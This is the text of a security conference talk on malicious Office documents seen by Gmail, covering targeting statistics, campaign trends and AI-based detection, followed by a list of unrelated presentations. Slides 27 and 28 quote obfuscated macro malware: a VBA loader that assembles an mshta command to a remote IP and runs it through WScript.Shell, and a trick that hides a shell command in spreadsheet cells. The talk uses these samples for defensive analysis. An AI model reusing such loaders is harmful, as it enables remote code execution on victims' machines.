malicious documents trends a gmail perspective
play

Malicious Documents Trends: a Gmail Perspective Google, @elie with - PowerPoint PPT Presentation

Mar 14, 2024 •207 likes •679 views

SESSION ID: HTA-T10 Malicious Documents Trends: a Gmail Perspective Google, @elie with the help of many Googlers Slides available here: htups://elie.net/rsa20 In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated

  1. SESSION ID: HTA-T10 Malicious Documents Trends: a Gmail Perspective Google, @elie with the help of many Googlers

  2. Slides available here: htups://elie.net/rsa20

  3. In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated offjce documents to target Ukrainian entities htups://www.anomali.com/fjles/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf

  4. PDF: 2% Offjce: 56% Malicious Documents represent a signifjcant paru of malware targeting our users

  5. Every week Gmail scan over 300B+ atuachments for malware

  6. Each second we need to process millions of documents in a matuer of milliseconds

  7. How Gmail malware detection works Policy Scanners Decision engine engine

  8. How Gmail malware detection works Policy Scanners Decision engine engine

  9. How Gmail malware detection works Policy Scanners Decision engine engine

  10. How Gmail malware detection works Policy Scanners Decision engine engine

  11. How about users and organization at risk of targeted atuack?

  12. Security Sandboxes are used to supplement detection when need.

  13. Agenda Who is targeted by malicious documents? Deconstructing malicious documents campaigns Insights into Gmail next-gen detection

  14. Who is targeted by malicious documents?

  15. Non for Education Company Government profjt Every type of organization is at risk of being targeted by malicious documents

  16. Education Company Non for profjt Government Some organizations are more targeted by malicious documents than others

  17. Education Finance & Insurance Health Care IT Wholesale Trade Retail Real Estate Manufacturing Utilities Transporuation Some industries are more targeted by malicious documents than others

  18. Indonesia Russia Germany India Japan France USA Finland Great Britain Norway Prevalence of malicious documents varies drastically from country to country

  19. Deconstructing malicious documents campaigns

  20. Cats through the ages 2000 BCE 1200 CE 1800 CE 2020 CE

  21. 63% of the malicious docs blocked by Gmail are difgerent from day to day

  22. The volume of malicious document greatly varies from day to day: 3x variation is the normal

  23. Locky ransomware Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was sending 100M locky samples per day in 2016

  24. The malicious document threat landscape is very fast-paced and extremely adversarial

  25. Kits ofgering weaponized document exploits packed with AV evasion techniques are routinely available on the blackmarket as SaaS for $400-$5000 https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728

  26. What techniques do those kits use?

  27. boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbR QzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY" boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m") boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a") dzkkGwK = "X" & "p" & "o" Mshta boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s") http://104.144.xxx.yyy/tron/stem.php AuOKypAOxXWC = "u" & "x" & Trim("G") LrdizVw = 1418 + 1239 + 1546 + 521 + 1029 iBEFgGzg = 1766 + 1267 + 544 + 1840 boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t") boazuda = Replace(boazuda, "iELOZqbRQzjY", "e") cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818 IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187 boazuda = Replace(boazuda, "dfnAfNznHxFV", "l") yCdrQfLG = "Z" & "y" & Trim("R") & "d" loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE" loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m") OFNCRKqKF = 1006 + 15 + 215 loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a") TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716 loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s") loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t") WScript.shell QFMdIPpUYY = 459 - 943 - 977 AUvwcPXcwXb = "E" & "Q" loquaz = Replace(loquaz, "wBfuroncKuUb", "e") iqEyuLuf = "D" & "A" & Trim("O") loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l") uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I") jXkIrzM = 128 - 1507 - 70 XjnfDLLd = Trim("k") & "o" & "p" CreateObject(loquaz).Run boazuda, 0 FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245 NbnCVgoojDpO = 1069 + 1656 + 957 + 714 CDDQFoi = 512 + 1320 zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860

  28. Atuackers try to evade q = "": m = "" detection by adding For i = use * 2 To use * 2 + 3 q = q + plumb(Cells(i, use * 2)): m = m + malware in XLS cell plumb(Cells(i + use / 2, use * 2)) Next i content. Shell q + cop(use, use) + m, ..

  29. Takeaways Obfuscator and 63% of malware are weaponized exploits difgerent from day to day are readily available

  30. Insights into Gmail next-gen malicious document detection

  31. Use AI to improve detection

  32. Really?

  33. Enhance existing detection capabilities with AI interpolation & advanced document analyzers to coverage and to adversarial atuacks

  34. Gmail detection landscape: today APT / 0day Advanced Defense obfuscation GAP / opporuunity Bulk malware Detection TCO

  35. Gmail detection landscape: tomorrow APT / 0day AI Advanced obfuscation Bulk malware Detection TCO

  36. How does it work in practice?

  37. Anatomy of a document scanner Feature Document extractors analyzer Macro AST Supervised Transpiler Machine Learning Macro/script Analyzer Execution Parsers Feedback loop for dynamic code (eval)

  38. How our AI scanner integrate with Gmail malware detection works Policy Scanners Decision engine engine

  39. Does it really work?

  40. AI only Both Other scanners only 200% 150% 100% 50% 0% Jan Jan Jan Jan Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb Feb 28 29 30 31 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 AI scanner increases Offjce documents with malicious documents detection by ~10% consistently and 150+% at peak

  41. 14.5% 10.5% Improvement varies by fjletype

  42. How do you build ground truth?

  43. No silver bullet: use a multi prong approach Hindsights samples Re-scan documents at a later stage to give a chance to re-evaluation various scanners to have their false positives fixed Additional sandbox Scan suspicious and a large subset of documents with scans sandboxes for additional verdicts Leverage deep-clustering to quickly identify the samples Cluster analysis that need to be reviewed to find potential FP / FN

  44. Deep-clustering to scale model improvements Example of a incorrect extrapolation - .dll in code was considered malicious

  45. Takeaways Malicious documents Adversary continuously Robust malicious is a key threat to shifu their TTP and documents detection businesses and end tweak their payload to requires a defense in users avoid detection depth strategy that combine detection approaches

  46. Robust malicious documents detection requires combining technologies and constant R&D htups://elie.net/rsa20

  47. Thank you

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Current Trends and Hot Topics from a MHRA Borderline Perspective Trends and Hot topics

Current Trends and Hot Topics from a MHRA Borderline Perspective Trends and Hot topics

Current Trends and Hot Topics from a MHRA Borderline Perspective Trends and Hot topics Products which are regulated under more than one legislative framework and how this relates to other areas of the borderline Borderline herbal

2.16k views • 36 slides
Trends and advances in optimization: Industry applications with historical perspective Tams

Trends and advances in optimization: Industry applications with historical perspective Tams

Trends and advances in optimization: Industry applications with historical perspective Tams Terlaky George N. and Soteria Kledaras '87 Endowed Chair Professor. Chair, Department of Industrial and Systems Engineering P.C. Rossin College of

697 views • 27 slides
from a Messianic Jewish Perspective Richard Harvey richardsharvey@gmail.com www.mmjt.eu B

from a Messianic Jewish Perspective Richard Harvey richardsharvey@gmail.com www.mmjt.eu B

from a Messianic Jewish Perspective Richard Harvey richardsharvey@gmail.com www.mmjt.eu B rothers Hirschland, London Mapping Messianic Jewish Theology Surveying the field 150,000 Messianic Jews? Need for theology and praxis of

356 views • 22 slides
Trends In Digital Transformation A Digital Marketing Perspective Lloyds - IT Matters 9th

Trends In Digital Transformation A Digital Marketing Perspective Lloyds - IT Matters 9th

Trends In Digital Transformation A Digital Marketing Perspective Lloyds - IT Matters 9th October 201 7 @theg Introduction Aqueduct Digital Agency Sports, Automotive, Finance We work with Marketing and IT departments to deliver

238 views • 20 slides
The First Perspective Image Perspective in Art Giotto, 1300 Campin, 1430 (before perspective)

The First Perspective Image Perspective in Art Giotto, 1300 Campin, 1430 (before perspective)

Italian Art in the Late Middle Ages In the Renaissance Filippo Brunelleschi Before the Discovery of Perspective Discovered Perspective Perspective is nothing else than the seeing of an object through a sheet of glass, on the surface of

344 views • 6 slides
The Sociological Perspective 1 Sociological Perspective.notebook August 28, 2014 What is

The Sociological Perspective 1 Sociological Perspective.notebook August 28, 2014 What is

Sociological Perspective.notebook August 28, 2014 The Sociological Perspective 1 Sociological Perspective.notebook August 28, 2014 What is Sociology? Cheers Example Trends Marriage The world around us Family People

769 views • 41 slides
Business Case from customer perspective Fekke Bakker fekke.zakelijk@gmail.com ROME | 13

Business Case from customer perspective Fekke Bakker fekke.zakelijk@gmail.com ROME | 13

Business Case from customer perspective Fekke Bakker fekke.zakelijk@gmail.com ROME | 13 October 2017 Agenda Introduction Examples Meening for Dutch Ministry of Defense Meening for others Additionals 2 Introduction

280 views • 10 slides
New Defence Perspective New Defence Perspective New Defence Perspective New Defence Perspective

New Defence Perspective New Defence Perspective New Defence Perspective New Defence Perspective

New Defence Perspective New Defence Perspective New Defence Perspective New Defence Perspective Innovative technology, knowledge, problem solving are critical for Canada and its allies to mitigate new threats, stay ahead of potential

469 views • 18 slides
New trends in Engineering Education a SEFI perspective Prof. Greet Langie chair of the Task

New trends in Engineering Education a SEFI perspective Prof. Greet Langie chair of the Task

New trends in Engineering Education a SEFI perspective Prof. Greet Langie chair of the Task Force on Capacity Building - Moscow, 30/11/2017 www.sefi.be francoise.come@sefi.be S ocit E uropenne pour la F ormation des I ngnieurs

698 views • 22 slides
Metric Matters Dain Perkins, CISSP Dain.Perkins@gmail.com My Perspective Information security

Metric Matters Dain Perkins, CISSP Dain.Perkins@gmail.com My Perspective Information security

Metric Matters Dain Perkins, CISSP Dain.Perkins@gmail.com My Perspective Information security metrics do not show us how we need to improve our defenses Image:

560 views • 28 slides
10/22/2020 lThrough Perspective-Taking and Empathy Presented by Jacky Howell, MA, Makai

10/22/2020 lThrough Perspective-Taking and Empathy Presented by Jacky Howell, MA, Makai

10/22/2020 lThrough Perspective-Taking and Empathy Presented by Jacky Howell, MA, Makai Kellogg, Sabina Zeffler azspire@gmail.com https://www.azspire.com 1 Jacky Howell, MA Consultant, Presenter, Author azspire@gmail.com

627 views • 25 slides
IBESA U.S. Storage Day Integrators Perspective on Trends in Battery Energy Storage Systems Pero

IBESA U.S. Storage Day Integrators Perspective on Trends in Battery Energy Storage Systems Pero

IBESA U.S. Storage Day Integrators Perspective on Trends in Battery Energy Storage Systems Pero C. Elizondo Flex Energy September 10, 2017 BESS Integration Network Charging Connection Batteries Point BESS Inverters Step up or

270 views • 15 slides
Governance of social services in the Czech Republic in a comparative perspective (Crucial trends

Governance of social services in the Czech Republic in a comparative perspective (Crucial trends

Governance of social services in the Czech Republic in a comparative perspective (Crucial trends and changes in social services in the CR in comparison to DK, GER and the UK in the last decade) P. Hork, M. Horkov and T. Sirovtka Main

444 views • 29 slides
Creating a Gmail Account Greg Edwards gregsedwards1974@gmail.com twitter.com/gregsedwards Gmail

Creating a Gmail Account Greg Edwards gregsedwards1974@gmail.com twitter.com/gregsedwards Gmail

Creating a Gmail Account Greg Edwards gregsedwards1974@gmail.com twitter.com/gregsedwards Gmail Google email for the masses People depend on personal email for communication What makes Gmail a good choice? Features and benefits

244 views • 6 slides
Perspective LanguaL Structured Vocabulary: USDA Perspective Joanne Holden Perspective: Earth

Perspective LanguaL Structured Vocabulary: USDA Perspective Joanne Holden Perspective: Earth

Perspective LanguaL Structured Vocabulary: USDA Perspective Joanne Holden Perspective: Earth Rise from the Moon Perspective: Population Density Perspective: Lightening Strikes Perspective: Pollution in the Atmosphere Perspective: Water

473 views • 44 slides
HNWI Trends in Asia A Singapore Perspective Presentation to Hubbis Asia Wealth Management Forum

HNWI Trends in Asia A Singapore Perspective Presentation to Hubbis Asia Wealth Management Forum

HNWI Trends in Asia A Singapore Perspective Presentation to Hubbis Asia Wealth Management Forum 2016 Zurich Chris Burton Managing Director, Vistra Singapore 25 October 2016 Vistra Group (as at June 2016) >200k 64 locations Over 2,500

420 views • 21 slides
Memor ory D y Defen enses es The Elevation from Obscurity to Headlines Rajeev Balasubramonian

Memor ory D y Defen enses es The Elevation from Obscurity to Headlines Rajeev Balasubramonian

Memor ory D y Defen enses es The Elevation from Obscurity to Headlines Rajeev Balasubramonian School of Computing, University of Utah 2 Image sources: pinterest, gizmodo Spectre Overview x is controlled Thanks to bpred, x can be

740 views • 30 slides
Cloud Control Design Review Team Andrew Thompson Anna Lee Project Lead, Audio Streaming

Cloud Control Design Review Team Andrew Thompson Anna Lee Project Lead, Audio Streaming

Cloud Control Design Review Team Andrew Thompson Anna Lee Project Lead, Audio Streaming Audio Processing Reed Taylor Brent Morada PCB Design, Audio Streaming Wireless Communication Project Vision, Applications

291 views • 28 slides
The consequences of sync_binlog != 1 by Jean-Franois Gagn Senior Infrastructure Engineer /

The consequences of sync_binlog != 1 by Jean-Franois Gagn Senior Infrastructure Engineer /

The consequences of sync_binlog != 1 by Jean-Franois Gagn Senior Infrastructure Engineer / System and MySQL Expert jeanfrancois AT messagebird DOT com / @jfg956 #FOSDEM #MySQLDevRoom The full title of the talk should be The consequences of

610 views • 32 slides
Deformable Organ Contour Transfer with Deep Inverse Shape Encoding (DISE) Networks for

Deformable Organ Contour Transfer with Deep Inverse Shape Encoding (DISE) Networks for

Deformable Organ Contour Transfer with Deep Inverse Shape Encoding (DISE) Networks for Auto-segmentation in Low Contrast Regions Tiancheng Liu 1 Xiaobai Sun 1 Fang-fang Yin 2 Lei Ren 2 1 Department of Computer Science, Duke University, USA 2

572 views • 20 slides
CSSE463: Image Recognition Day 26 This week Today: Finding lines and circles using the

CSSE463: Image Recognition Day 26 This week Today: Finding lines and circles using the

CSSE463: Image Recognition Day 26 This week Today: Finding lines and circles using the Hough transform (Sonka 6.26) Please fill out ANGEL evaluation of Sunset partner using "Term Project Partner Evaluation" Next class:

357 views • 14 slides
MLCC 2015 machine learning applications Francesca Odone ML applications Machine Learning

MLCC 2015 machine learning applications Francesca Odone ML applications Machine Learning

MLCC 2015 machine learning applications Francesca Odone ML applications Machine Learning systems are trained on examples rather than being programmed MLCC machine learning applications Data challenges big data - extract real knowledge from

451 views • 30 slides
VU Augmented Reality on Mobile Devices VU Augmented Reality on Mobile Devices Introduction

VU Augmented Reality on Mobile Devices VU Augmented Reality on Mobile Devices Introduction

VU Augmented Reality on Mobile Devices VU Augmented Reality on Mobile Devices Introduction Introduction What is AR What is AR Interaction Techniques Navigation Collaboration Navigation, Collaboration Visualization

760 views • 55 slides
Improves Engagement Guest Presenter: Ken Gibson Senior Vice President The VisionLink Advisory

Improves Engagement Guest Presenter: Ken Gibson Senior Vice President The VisionLink Advisory

4 Keys to Building a Pay Strategy that Improves Engagement Guest Presenter: Ken Gibson Senior Vice President The VisionLink Advisory Group Talent Takeaways webinar & podcast series AGENDA The Series Talent Takeaways webinar &

1.08k views • 60 slides

More recommend